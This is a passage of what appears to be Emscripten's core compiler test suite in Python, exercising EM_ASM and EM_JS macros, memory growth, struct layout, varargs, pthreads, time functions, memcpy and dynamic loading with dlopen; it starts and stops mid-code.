printf("%d\n", emscripten_has_asyncify());
return 0;
}
'''
self.set_setting('ASYNCIFY', 0)
self.do_run(src, '0')
self.set_setting('ASYNCIFY')
self.do_run(src, '1')
# TODO: test only worked in non-fastcomp
def test_inlinejs(self):
self.skipTest('non-fastcomp is deprecated and fails in 3.5') # only supports EM_ASM
self.do_core_test('test_inlinejs.c')
if self.emcc_args == []:
# opts will eliminate the comments
out = read_file('src.js')
for i in range(1, 5):
assert ('comment%d' % i) in out
# TODO: test only worked in non-fastcomp
def test_inlinejs2(self):
self.skipTest('non-fastcomp is deprecated and fails in 3.5') # only supports EM_ASM
self.do_core_test('test_inlinejs2.c')
def test_inlinejs3(self):
if self.is_wasm():
self.skipTest('wasm requires a proper asm module')
src = test_file('core/test_inlinejs3.c')
output = shared.unsuffixed(src) + '.out'
self.do_core_test('test_inlinejs3.c')
print('no debugger, check validation')
src = read_file(src).replace('emscripten_debugger();', '')
self.do_run(src, read_file(output))
def test_inlinejs4(self):
self.do_run(r'''
#include <emscripten.h>
#define TO_STRING_INNER(x) #x
#define TO_STRING(x) TO_STRING_INNER(x)
#define assert_msg(msg, file, line) EM_ASM( throw 'Assert (' + msg + ') failed in ' + file + ':' + line + '!'; )
#define assert(expr) { \
if (!(expr)) { \
assert_msg(#expr, TO_STRING(__FILE__), TO_STRING(__LINE__)); \
} \
}
int main(int argc, char **argv) {
assert(argc != 17);
assert(false);
return 0;
}
''', 'false', assert_returncode=NON_ZERO)
def test_em_asm(self):
self.do_core_test('test_em_asm.cpp')
self.emcc_args.append('-std=gnu89')
self.do_core_test('test_em_asm.cpp', force_c=True)
# Tests various different ways to invoke the EM_ASM(), EM_ASM_INT()
# and EM_ASM_DOUBLE() macros.
def test_em_asm_2(self):
self.do_core_test('test_em_asm_2.cpp')
self.emcc_args.append('-std=gnu89')
self.do_core_test('test_em_asm_2.cpp', force_c=True)
# Tests various different ways to invoke the MAIN_THREAD_EM_ASM(), MAIN_THREAD_EM_ASM_INT() and MAIN_THREAD_EM_ASM_DOUBLE() macros.
# This test is identical to test_em_asm_2, except that it search-replaces EM_ASM with MAIN_THREAD_EM_ASM in the test file. That way if new
# test cases are added to test_em_asm_2.cpp for EM_ASM, they will also get tested in MAIN_THREAD_EM_ASM form.
def test_main_thread_em_asm(self):
src = read_file(test_file('core/test_em_asm_2.cpp'))
create_file('src.cpp', src.replace('EM_ASM', 'MAIN_THREAD_EM_ASM'))
expected_result = read_file(test_file('core/test_em_asm_2.out'))
create_file('result.out', expected_result.replace('EM_ASM', 'MAIN_THREAD_EM_ASM'))
self.do_run_from_file('src.cpp', 'result.out')
self.do_run_from_file('src.cpp', 'result.out', force_c=True)
def test_main_thread_async_em_asm(self):
self.do_core_test('test_main_thread_async_em_asm.cpp')
self.do_core_test('test_main_thread_async_em_asm.cpp', force_c=True)
# Tests MAIN_THREAD_EM_ASM_INT() function call with different signatures.
def test_main_thread_em_asm_signatures(self):
self.do_core_test('test_em_asm_signatures.cpp', assert_returncode=NON_ZERO)
def test_em_asm_unicode(self):
self.do_core_test('test_em_asm_unicode.cpp')
self.do_core_test('test_em_asm_unicode.cpp', force_c=True)
def test_em_asm_types(self):
self.do_core_test('test_em_asm_types.cpp')
self.do_core_test('test_em_asm_types.cpp', force_c=True)
def test_em_asm_unused_arguments(self):
self.do_core_test('test_em_asm_unused_arguments.cpp')
# Verify that EM_ASM macros support getting called with multiple arities.
# Even if tests are later joined into larger compilation units, this must
# still be compiled separately from other code using EM_ASM macros with
# arities 1-3. Otherwise this may incorrectly report a success.
def test_em_asm_parameter_pack(self):
self.do_core_test('test_em_asm_parameter_pack.cpp')
def test_em_asm_arguments_side_effects(self):
self.do_core_test('test_em_asm_arguments_side_effects.cpp')
self.do_core_test('test_em_asm_arguments_side_effects.cpp', force_c=True)
def test_em_asm_direct(self):
self.do_core_test('test_em_asm_direct.c')
@parameterized({
'': ([], False),
'c': ([], True),
'linked': (['-sMAIN_MODULE'], False),
'linked_c': (['-sMAIN_MODULE'], True),
})
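# Each variant is (extra emcc args, force_c): the 'linked' variants add -sMAIN_MODULE to
# check that EM_JS also works under dynamic linking, and the '_c' variants build as C.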
def test_em_js(self, args, force_c):
if '-sMAIN_MODULE' in args:
self.check_dylink()
self.emcc_args += args
if '-sMAIN_MODULE' not in args:
self.emcc_args += ['-sEXPORTED_FUNCTIONS=_main,_malloc']
self.do_core_test('test_em_js.cpp', force_c=force_c)
self.assertContained("no args returning int", read_file('test_em_js.js'))
def test_runtime_stacksave(self):
self.do_runf(test_file('core/test_runtime_stacksave.c'), 'success')
# Tests that -s MINIMAL_RUNTIME=1 builds can utilize -s ALLOW_MEMORY_GROWTH=1 option.
def test_minimal_runtime_memorygrowth(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
self.set_setting('MINIMAL_RUNTIME')
src = test_file('core/test_memorygrowth.c')
# Fail without memory growth
self.do_runf(src, 'OOM', assert_returncode=NON_ZERO)
# Win with it
self.set_setting('ALLOW_MEMORY_GROWTH')
self.do_runf(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
def test_memorygrowth(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
if self.maybe_closure():
# verify DYNAMIC_EXECUTION=0 is compatible with closure
self.set_setting('DYNAMIC_EXECUTION', 0)
# With typed arrays in particular, it is dangerous to use more memory than INITIAL_MEMORY,
# since we then need to enlarge the heap(s).
src = test_file('core/test_memorygrowth.c')
# Fail without memory growth
self.do_runf(src, 'OOM', assert_returncode=NON_ZERO)
fail = read_file('test_memorygrowth.js')
# Win with it
self.set_setting('ALLOW_MEMORY_GROWTH')
self.do_runf(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
win = read_file('test_memorygrowth.js')
if '-O2' in self.emcc_args and not self.is_wasm():
# Make sure ALLOW_MEMORY_GROWTH generates different code (should be less optimized)
possible_starts = ['// EMSCRIPTEN_START_FUNCS', 'var TOTAL_STACK']
code_start = None
for s in possible_starts:
if fail.find(s) >= 0:
code_start = s
break
assert code_start is not None, 'Generated code must contain one of ' + str(possible_starts)
fail = fail[fail.find(code_start):]
win = win[win.find(code_start):]
assert len(fail) < len(win), 'failing code - without memory growth on - is more optimized, and smaller' + str([len(fail), len(win)])
# Tracing of memory growth should work
# (SAFE_HEAP would instrument the tracing code itself, leading to recursion)
if not self.get_setting('SAFE_HEAP'):
self.emcc_args += ['--tracing']
self.do_runf(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
def test_memorygrowth_2(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
# With typed arrays in particular, it is dangerous to use more memory than INITIAL_MEMORY,
# since we then need to enlarge the heap(s).
src = test_file('core/test_memorygrowth_2.c')
# Fail without memory growth
self.do_runf(src, 'OOM', assert_returncode=NON_ZERO)
fail = read_file('test_memorygrowth_2.js')
# Win with it
self.set_setting('ALLOW_MEMORY_GROWTH')
self.do_runf(src, '*pre: hello,4.955*\n*hello,4.955*\n*hello,4.955*')
win = read_file('test_memorygrowth_2.js')
if '-O2' in self.emcc_args and not self.is_wasm():
# Make sure ALLOW_MEMORY_GROWTH generates different code (should be less optimized)
assert len(fail) < len(win), 'failing code - without memory growth on - is more optimized, and smaller' + str([len(fail), len(win)])
def test_memorygrowth_3(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
# checks handling of malloc failure properly
self.set_setting('ABORTING_MALLOC', 0)
self.set_setting('SAFE_HEAP')
self.do_core_test('test_memorygrowth_3.c')
@also_with_standalone_wasm(impure=True)
def test_memorygrowth_MAXIMUM_MEMORY(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
if not self.is_wasm():
self.skipTest('wasm memory specific test')
# check that memory growth does not exceed the wasm mem max limit
self.emcc_args += ['-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=64Mb', '-sMAXIMUM_MEMORY=100Mb']
self.do_core_test('test_memorygrowth_wasm_mem_max.c')
def test_memorygrowth_linear_step(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
if not self.is_wasm():
self.skipTest('wasm memory specific test')
# check that memory growth does not exceed the wasm mem max limit, and ends exactly at (or one step below) the wasm mem max
self.emcc_args += ['-sALLOW_MEMORY_GROWTH', '-sTOTAL_STACK=1Mb', '-sINITIAL_MEMORY=64Mb', '-sMAXIMUM_MEMORY=130Mb', '-sMEMORY_GROWTH_LINEAR_STEP=1Mb']
self.do_core_test('test_memorygrowth_memory_growth_step.c')
def test_memorygrowth_geometric_step(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
if not self.is_wasm():
self.skipTest('wasm memory specific test')
self.emcc_args += ['-sALLOW_MEMORY_GROWTH', '-sMEMORY_GROWTH_GEOMETRIC_STEP=8.5', '-sMEMORY_GROWTH_GEOMETRIC_CAP=32MB']
self.do_core_test('test_memorygrowth_geometric_step.c')
def test_memorygrowth_3_force_fail_reallocBuffer(self):
if self.has_changed_setting('ALLOW_MEMORY_GROWTH'):
self.skipTest('test needs to modify memory growth')
self.set_setting('ALLOW_MEMORY_GROWTH')
self.set_setting('TEST_MEMORY_GROWTH_FAILS')
self.do_core_test('test_memorygrowth_3.c')
@parameterized({
'nogrow': ([],),
'grow': (['-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=18MB'],)
})
@no_asan('requires more memory when growing')
@no_lsan('requires more memory when growing')
@no_memory64('does not fail under wasm64')
def test_aborting_new(self, args):
# test that C++ new properly errors if we fail to malloc when growth is
# enabled, with or without growth
self.emcc_args += args
self.do_core_test('test_aborting_new.cpp')
@no_wasm2js('no WebAssembly.Memory()')
@no_asan('ASan alters the memory size')
@no_lsan('LSan alters the memory size')
def test_module_wasm_memory(self):
self.emcc_args += ['--pre-js', test_file('core/test_module_wasm_memory.js')]
self.set_setting('IMPORTED_MEMORY')
self.do_runf(test_file('core/test_module_wasm_memory.c'), 'success')
def test_ssr(self): # struct self-ref
src = '''
#include <stdio.h>
// see related things in openjpeg
typedef struct opj_mqc_state {
unsigned int qeval;
int mps;
struct opj_mqc_state *nmps;
struct opj_mqc_state *nlps;
} opj_mqc_state_t;
static opj_mqc_state_t mqc_states[4] = {
{0x5600, 0, &mqc_states[2], &mqc_states[3]},
{0x5602, 1, &mqc_states[3], &mqc_states[2]},
};
int main() {
printf("*%ld*\\n", (long)(mqc_states+1)-(long)mqc_states);
for (int i = 0; i < 2; i++)
printf("%d:%d,%d,%ld,%ld\\n", i, mqc_states[i].qeval, mqc_states[i].mps,
(long)mqc_states[i].nmps-(long)mqc_states, (long)mqc_states[i].nlps-(long)mqc_states);
return 0;
}
'''
self.do_run(src, '''*16*\n0:22016,0,32,48\n1:22018,1,48,32\n''')
def test_tinyfuncstr(self):
self.do_core_test('test_tinyfuncstr.cpp')
def test_llvmswitch(self):
self.do_core_test('test_llvmswitch.c')
def test_cxx_version(self):
self.do_core_test('test_cxx_version.cpp')
@no_wasm2js('massive switches can break js engines')
def test_bigswitch(self):
self.do_runf(test_file('bigswitch.cpp'), '''34962: GL_ARRAY_BUFFER (0x8892)
26214: what?
35040: GL_STREAM_DRAW (0x88E0)
3060: what?
''', args=['34962', '26214', '35040', str(0xbf4)])
@no_wasm2js('massive switches can break js engines')
@is_slow_test
def test_biggerswitch(self):
if not self.is_optimizing():
self.skipTest('nodejs takes >6GB to compile this if the wasm is not optimized, which OOMs, see https://github.com/emscripten-core/emscripten/issues/7928#issuecomment-458308453')
num_cases = 20000
switch_case = self.run_process([PYTHON, test_file('gen_large_switchcase.py'), str(num_cases)], stdout=PIPE, stderr=PIPE).stdout
self.do_run(switch_case, '''58996: 589965899658996
59297: 592975929759297
59598: default
59899: 598995989959899
Success!''')
def test_indirectbr(self):
self.emcc_args = [x for x in self.emcc_args if x != '-g']
self.do_core_test('test_indirectbr.c')
@no_asan('local count too large for VMs')
@no_wasm2js('extremely deep nesting, hits stack limit on some VMs')
def test_indirectbr_many(self):
self.do_core_test('test_indirectbr_many.c')
def test_pack(self):
src = '''
#include <stdio.h>
#include <string.h>
#pragma pack(push,1)
typedef struct header
{
unsigned char id;
unsigned short colour;
unsigned char desc;
} header;
#pragma pack(pop)
typedef struct fatheader
{
unsigned char id;
unsigned short colour;
unsigned char desc;
} fatheader;
int main( int argc, const char *argv[] ) {
header h, *ph = 0;
fatheader fh, *pfh = 0;
printf("*%zu,%ld,%ld*\\n", sizeof(header), (long)((long)&h.desc - (long)&h.id), (long)(&ph[1])-(long)(&ph[0]));
printf("*%zu,%ld,%ld*\\n", sizeof(fatheader), (long)((long)&fh.desc - (long)&fh.id), (long)(&pfh[1])-(long)(&pfh[0]));
return 0;
}
'''
self.do_run(src, '*4,3,4*\n*6,4,6*')
def test_varargs(self):
self.do_core_test('test_varargs.c')
def test_varargs_multi(self):
self.do_core_test('test_varargs_multi.c')
@unittest.skip('clang cannot compile this code with that target yet')
def test_varargs_byval(self):
src = r'''
#include <stdio.h>
#include <stdarg.h>
typedef struct type_a {
union {
double f;
void *p;
int i;
short sym;
} value;
} type_a;
enum mrb_vtype {
MRB_TT_FALSE = 0, /* 0 */
MRB_TT_CLASS = 9 /* 9 */
};
typedef struct type_b {
enum mrb_vtype tt:8;
} type_b;
void print_type_a(int argc, ...);
void print_type_b(int argc, ...);
int main(int argc, char *argv[])
{
type_a a;
type_b b;
a.value.p = (void*) 0x12345678;
b.tt = MRB_TT_CLASS;
printf("The original address of a is: %p\n", a.value.p);
printf("The original type of b is: %d\n", b.tt);
print_type_a(1, a);
print_type_b(1, b);
return 0;
}
void print_type_a(int argc, ...) {
va_list ap;
type_a a;
va_start(ap, argc);
a = va_arg(ap, type_a);
va_end(ap);
printf("The current address of a is: %p\n", a.value.p);
}
void print_type_b(int argc, ...) {
va_list ap;
type_b b;
va_start(ap, argc);
b = va_arg(ap, type_b);
va_end(ap);
printf("The current type of b is: %d\n", b.tt);
}
'''
self.do_run(src, '''The original address of a is: 0x12345678
The original type of b is: 9
The current address of a is: 0x12345678
The current type of b is: 9
''')
def test_functionpointer_libfunc_varargs(self):
self.do_core_test('test_functionpointer_libfunc_varargs.c')
def test_structbyval(self):
self.set_setting('INLINING_LIMIT')
# part 1: make sure that normally, passing structs by value works
src = r'''
#include <stdio.h>
struct point
{
int x, y;
};
void dump(struct point p) {
p.x++; // should not modify
p.y++; // anything in the caller!
printf("dump: %d,%d\n", p.x, p.y);
}
void dumpmod(struct point *p) {
p->x++; // should not modify
p->y++; // anything in the caller!
printf("dump: %d,%d\n", p->x, p->y);
}
int main( int argc, const char *argv[] ) {
point p = { 54, 2 };
printf("pre: %d,%d\n", p.x, p.y);
dump(p);
void (*dp)(point p) = dump; // And, as a function pointer
dp(p);
printf("post: %d,%d\n", p.x, p.y);
dumpmod(&p);
dumpmod(&p);
printf("last: %d,%d\n", p.x, p.y);
return 0;
}
'''
self.do_run(src, 'pre: 54,2\ndump: 55,3\ndump: 55,3\npost: 54,2\ndump: 55,3\ndump: 56,4\nlast: 56,4')
def test_stdlibs(self):
# safe heap prints a warning that messes up our output.
self.set_setting('SAFE_HEAP', 0)
# needs atexit
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_stdlibs.c')
def test_stdbool(self):
create_file('test_stdbool.c', r'''
#include <stdio.h>
#include <stdbool.h>
int main() {
bool x = true;
bool y = false;
printf("*%d*\n", x != y);
return 0;
}
''')
self.do_runf('test_stdbool.c', '*1*')
def test_strtoll_hex(self):
# tests strtoll for hex strings (0x...)
self.do_core_test('test_strtoll_hex.c')
def test_strtoll_dec(self):
# tests strtoll for decimal strings
self.do_core_test('test_strtoll_dec.c')
def test_strtoll_bin(self):
# tests strtoll for binary strings (0b...)
self.do_core_test('test_strtoll_bin.c')
def test_strtoll_oct(self):
# tests strtoll for octal strings (leading 0)
self.do_core_test('test_strtoll_oct.c')
def test_strtol_hex(self):
# tests strtol for hex strings (0x...)
self.do_core_test('test_strtol_hex.c')
def test_strtol_dec(self):
# tests strtol for decimal strings
self.do_core_test('test_strtol_dec.c')
def test_strtol_bin(self):
# tests strtol for binary strings (0b...)
self.do_core_test('test_strtol_bin.c')
def test_strtol_oct(self):
# tests strtol for octal strings (leading 0)
self.do_core_test('test_strtol_oct.c')
@also_with_standalone_wasm()
def test_atexit(self):
# Confirms atexit handlers are called in the proper reverse order
if not self.get_setting('STANDALONE_WASM'):
# STANDALONE_WASM mode always sets EXIT_RUNTIME if main exists
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_atexit.c')
@no_lsan('https://github.com/emscripten-core/emscripten/issues/15988')
def test_atexit_threads_stub(self):
# also tests thread exit (__cxa_thread_atexit)
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_atexit_threads.cpp')
@node_pthreads
def test_atexit_threads(self):
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_atexit_threads.cpp')
@no_asan('test relies on null pointer reads')
def test_pthread_specific(self):
self.do_run_in_out_file_test('pthread/specific.c')
def test_pthread_equal(self):
self.do_run_in_out_file_test('pthread/test_pthread_equal.cpp')
@node_pthreads
def test_pthread_proxying(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('INITIAL_MEMORY=32mb')
args = [f'-I{path_from_root("system/lib/pthread")}']
self.do_run_in_out_file_test('pthread/test_pthread_proxying.c',
emcc_args=args, interleaved_output=False)
@node_pthreads
def test_pthread_dispatch_after_exit(self):
self.do_run_in_out_file_test('pthread/test_pthread_dispatch_after_exit.c', interleaved_output=False)
@node_pthreads
def test_pthread_atexit(self):
# Test to ensure threads are still running when atexit-registered functions are called
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.do_run_in_out_file_test('pthread/test_pthread_atexit.c')
@node_pthreads
def test_pthread_nested_work_queue(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.do_run_in_out_file_test('pthread/test_pthread_nested_work_queue.c')
@node_pthreads
def test_pthread_thread_local_storage(self):
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('INITIAL_MEMORY', '300mb')
self.do_run_in_out_file_test('pthread/test_pthread_thread_local_storage.cpp')
@node_pthreads
def test_pthread_cleanup(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 4)
self.do_run_in_out_file_test('pthread/test_pthread_cleanup.cpp')
@node_pthreads
def test_pthread_setspecific_mainthread(self):
self.set_setting('EXIT_RUNTIME')
print('.. return')
self.do_runf(test_file('pthread/test_pthread_setspecific_mainthread.c'), 'done!', emcc_args=['-DRETURN'])
print('.. exit')
self.do_runf(test_file('pthread/test_pthread_setspecific_mainthread.c'), 'done!', emcc_args=['-DEXIT'])
print('.. pthread_exit')
self.do_run_in_out_file_test('pthread/test_pthread_setspecific_mainthread.c')
@node_pthreads
def test_pthread_attr_getstack(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 1)
self.do_run_in_out_file_test('pthread/test_pthread_attr_getstack.c')
@node_pthreads
@no_mac('https://github.com/emscripten-core/emscripten/issues/15014')
def test_pthread_abort(self):
self.set_setting('PROXY_TO_PTHREAD')
# Add the onAbort handler at runtime during preRun. This means that onAbort
# handler will only be present in the main thread (much like it would if it
# was passed in by pre-populating the module object prior to loading).
self.add_pre_run("Module.onAbort = function() { console.log('onAbort called'); }")
self.do_run_in_out_file_test('pthread/test_pthread_abort.c', assert_returncode=NON_ZERO)
@node_pthreads
def test_pthread_abort_interrupt(self):
self.set_setting('EXIT_RUNTIME')
self.set_setting('PTHREAD_POOL_SIZE', 1)
expected = ['Aborted(). Build with -s ASSERTIONS=1 for more info', 'Aborted(native code called abort())']
self.do_runf(test_file('pthread/test_pthread_abort_interrupt.c'), expected, assert_returncode=NON_ZERO)
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
@node_pthreads
def test_pthread_emmalloc(self):
self.emcc_args += ['-fno-builtin']
self.set_setting('PROXY_TO_PTHREAD')
self.set_setting('EXIT_RUNTIME')
self.set_setting('ASSERTIONS', 2)
self.set_setting('MALLOC', 'emmalloc')
self.do_core_test('test_emmalloc.c')
def test_tcgetattr(self):
self.do_runf(test_file('termios/test_tcgetattr.c'), 'success')
def test_time(self):
self.do_core_test('test_time.cpp')
for tz in ['EST+05EDT', 'UTC+0']:
print('extra tz test:', tz)
with env_modify({'TZ': tz}):
# Run the test with different time zone settings if
# possible. It seems that the TZ environment variable does not
# work all the time (at least it's not well respected by
# Node.js on Windows), but it does no harm either.
self.do_core_test('test_time.cpp')
def test_timeb(self):
# tests ftime() and struct timeb
self.do_core_test('test_timeb.c')
def test_time_c(self):
self.do_core_test('test_time_c.c')
def test_gmtime(self):
self.do_core_test('test_gmtime.c')
def test_strptime_tm(self):
self.do_core_test('test_strptime_tm.c')
def test_strptime_days(self):
self.do_core_test('test_strptime_days.c')
def test_strptime_reentrant(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_strptime_reentrant.c')
def test_strftime(self):
self.do_core_test('test_strftime.cpp')
def test_trickystring(self):
self.do_core_test('test_trickystring.c')
def test_statics(self):
self.do_core_test('test_statics.cpp')
def test_copyop(self):
# clang generated code is vulnerable to this, as it uses
# memcpy for assignments, with hardcoded numbers of bytes
# (llvm-gcc copies items one by one).
self.do_core_test('test_copyop.cpp')
def test_memcpy_memcmp(self):
self.banned_js_engines = [config.V8_ENGINE] # Currently broken under V8_ENGINE but not node
def check(output):
output = output.replace('\n \n', '\n') # remove extra node output
return hashlib.sha1(output.encode('utf-8')).hexdigest()
self.do_core_test('test_memcpy_memcmp.c', output_nicerizer=check)
def test_memcpy2(self):
self.do_core_test('test_memcpy2.c')
def test_memcpy3(self):
self.do_core_test('test_memcpy3.c')
@also_with_standalone_wasm()
def test_memcpy_alignment(self):
self.do_runf(test_file('test_memcpy_alignment.cpp'), 'OK.')
def test_memset_alignment(self):
self.do_runf(test_file('test_memset_alignment.cpp'), 'OK.')
def test_memset(self):
self.do_core_test('test_memset.c')
def test_getopt(self):
self.do_core_test('test_getopt.c', args=['-t', '12', '-n', 'foobar'])
def test_getopt_long(self):
self.do_core_test('test_getopt_long.c', args=['--file', 'foobar', '-b'])
def test_memmove(self):
self.do_core_test('test_memmove.c')
def test_memmove2(self):
self.do_core_test('test_memmove2.c')
def test_memmove3(self):
self.do_core_test('test_memmove3.c')
def test_flexarray_struct(self):
self.do_core_test('test_flexarray_struct.c')
def test_bsearch(self):
self.do_core_test('test_bsearch.c')
def test_stack_overflow(self):
self.set_setting('ASSERTIONS', 2)
self.do_runf(test_file('core/stack_overflow.cpp'), 'stack overflow', assert_returncode=NON_ZERO)
def test_stackAlloc(self):
self.do_core_test('stackAlloc.cpp')
def test_nestedstructs(self):
src = '''
#include <stdio.h>
#include "emscripten.h"
struct base {
int x;
float y;
union {
int a;
float b;
};
char c;
};
struct hashtableentry {
int key;
base data;
};
struct hashset {
typedef hashtableentry entry;
struct chain { entry elem; chain *next; };
// struct chainchunk { chain chains[100]; chainchunk *next; };
};
struct hashtable : hashset {
hashtable() {
base *b = NULL;
entry *e = NULL;
chain *c = NULL;
printf("*%zu,%ld,%ld,%ld,%ld,%ld|%zu,%ld,%ld,%ld,%ld,%ld,%ld,%ld|%zu,%ld,%ld,%ld,%ld,%ld,%ld,%ld,%ld,%ld*\\n",
sizeof(base),
long(&(b->x)), long(&(b->y)), long(&(b->a)), long(&(b->b)), long(&(b->c)),
sizeof(hashtableentry),
long(&(e->key)), long(&(e->data)), long(&(e->data.x)), long(&(e->data.y)), long(&(e->data.a)), long(&(e->data.b)), long(&(e->data.c)),
sizeof(hashset::chain),
long(&(c->elem)), long(&(c->next)), long(&(c->elem.key)), long(&(c->elem.data)), long(&(c->elem.data.x)), long(&(c->elem.data.y)), long(&(c->elem.data.a)), long(&(c->elem.data.b)), long(&(c->elem.data.c))
);
}
};
struct B { char buffer[62]; int last; char laster; char laster2; };
struct Bits {
unsigned short A : 1;
unsigned short B : 1;
unsigned short C : 1;
unsigned short D : 1;
unsigned short x1 : 1;
unsigned short x2 : 1;
unsigned short x3 : 1;
unsigned short x4 : 1;
};
int main() {
hashtable t;
// Part 2 - the char[] should be compressed, BUT have a padding space at the end so the next
// one is aligned properly. Also handle char; char; etc. properly.
B *b = NULL;
printf("*%ld,%ld,%ld,%ld,%ld,%ld,%ld,%ld,%zu*\\n", long(b), long(&(b->buffer)), long(&(b->buffer[0])), long(&(b->buffer[1])), long(&(b->buffer[2])),
long(&(b->last)), long(&(b->laster)), long(&(b->laster2)), sizeof(B));
// Part 3 - bitfields, and small structures
Bits *b2 = NULL;
printf("*%zu*\\n", sizeof(Bits));
return 0;
}
'''
# Bloated memory; same layout as C/C++
self.do_run(src, '*16,0,4,8,8,12|20,0,4,4,8,12,12,16|24,0,20,0,4,4,8,12,12,16*\n*0,0,0,1,2,64,68,69,72*\n*2*')
def prep_dlfcn_main(self):
self.set_setting('NODERAWFS')
self.clear_setting('SIDE_MODULE')
# Link against the side modules but don't load them on startup.
self.set_setting('NO_AUTOLOAD_DYLIBS')
self.emcc_args.append('liblib.so')
# This means we can use MAIN_MODULE=2 without needing to explicitly
# specify EXPORTED_FUNCTIONS.
self.set_setting('MAIN_MODULE', 2)
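# Builds `filename` as a SIDE_MODULE and renames the output to liblib.so, the fixed
# name that the main programs in these dlfcn tests dlopen at runtime.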
def build_dlfcn_lib(self, filename):
self.clear_setting('MAIN_MODULE')
self.set_setting('SIDE_MODULE')
outfile = self.build(filename, js_outfile=not self.is_wasm())
shutil.move(outfile, 'liblib.so')
@needs_dylink
def test_dlfcn_missing(self):
self.set_setting('MAIN_MODULE')
self.set_setting('ASSERTIONS')
src = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <assert.h>
int main() {
void* lib_handle = dlopen("libfoo.so", RTLD_NOW);
assert(!lib_handle);
printf("error: %s\n", dlerror());
return 0;
}
'''
self.do_run(src, "error: Could not load dynamic lib: libfoo.so\nError: ENOENT: no such file or directory, open 'libfoo.so'")
@needs_dylink
def test_dlfcn_basic(self):
create_file('liblib.cpp', '''
#include <cstdio>
class Foo {
public:
Foo() {
puts("Constructing lib object.");
}
};
Foo global;
''')
self.build_dlfcn_lib('liblib.cpp')
self.prep_dlfcn_main()
src = '''
#include <cstdio>
#include <dlfcn.h>
class Bar {
public:
Bar() {
puts("Constructing main object.");
}
};
Bar global;
int main() {
dlopen("liblib.so", RTLD_NOW);
return 0;
}
'''
self.do_run(src, 'Constructing main object.\nConstructing lib object.\n')
@needs_dylink
def test_dlfcn_i64(self):
create_file('liblib.c', '''
#include <inttypes.h>
int64_t foo(int x) {
return (long long)x / (long long)1234;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = r'''
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
typedef int64_t (*int64func)(int);
int main() {
void *lib_handle = dlopen("liblib.so", RTLD_NOW);
if (!lib_handle) {
puts(dlerror());
abort();
}
printf("dll handle: %p\n", lib_handle);
int64func x = (int64func)dlsym(lib_handle, "foo");
printf("foo func handle: %p\n", x);
if (!x) {
printf("dlsym failed: %s\n", dlerror());
return 1;
}
printf("|%lld|\n", x(81234567));
return 0;
}
'''
self.do_run(src, '|65830|')
@needs_dylink
@disabled('EM_ASM in not yet supported in SIDE_MODULE')
def test_dlfcn_em_asm(self):
create_file('liblib.cpp', '''
#include <emscripten.h>
class Foo {
public:
Foo() {
EM_ASM( out("Constructing lib object.") );
}
};
Foo global;
''')
self.build_dlfcn_lib('liblib.cpp')
self.prep_dlfcn_main()
src = '''
#include <emscripten.h>
#include <dlfcn.h>
class Bar {
public:
Bar() {
EM_ASM( out("Constructing main object.") );
}
};
Bar global;
int main() {
dlopen("liblib.so", RTLD_NOW);
EM_ASM( out("All done.") );
return 0;
}
'''
self.do_run(src, 'Constructing main object.\nConstructing lib object.\nAll done.\n')
@needs_dylink
def test_dlfcn_qsort(self):
create_file('liblib.c', '''
int lib_cmp(const void* left, const void* right) {
const int* a = (const int*) left;
const int* b = (const int*) right;
if(*a > *b) return 1;
else if(*a == *b) return 0;
else return -1;
}
typedef int (*CMP_TYPE)(const void*, const void*);
CMP_TYPE get_cmp() {
return lib_cmp;
}
''')
self.build_dlfcn_lib('liblib.c')
self.prep_dlfcn_main()
src = '''
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
typedef int (*CMP_TYPE)(const void*, const void*);
int main_cmp(const void* left, const void* right) {
const int* a = (const int*) left;
const int* b = (const int*) right;
if(*a < *b) return 1;
else if(*a == *b) return 0;
else return -1;
}
int main() {
void* lib_handle;
CMP_TYPE (*getter_ptr)();
CMP_TYPE lib_cmp_ptr;
int arr[5] = {4, 2, 5, 1, 3};
qsort((void*)arr, 5, sizeof(int), main_cmp);
printf("Sort with main comparison: ");
for (int i = 0; i < 5; i++) {
printf("%d ", arr[i]);
}
printf("\\n");
lib_handle = dlopen("liblib.so", RTLD_NOW);
if (lib_handle == NULL) {
printf("Could not load lib.\\n");
return 1;
}
getter_ptr = (CMP_TYPE (*)()) dlsym(lib_handle, "get_cmp");
if (getter_ptr == NULL) {
printf("Could not find func.\\n");
return 1;
}
lib_cmp_ptr = getter_ptr();
qsort((void*)arr, 5, sizeof(int), lib_cmp_ptr);
printf("Sort with lib comparison: ");
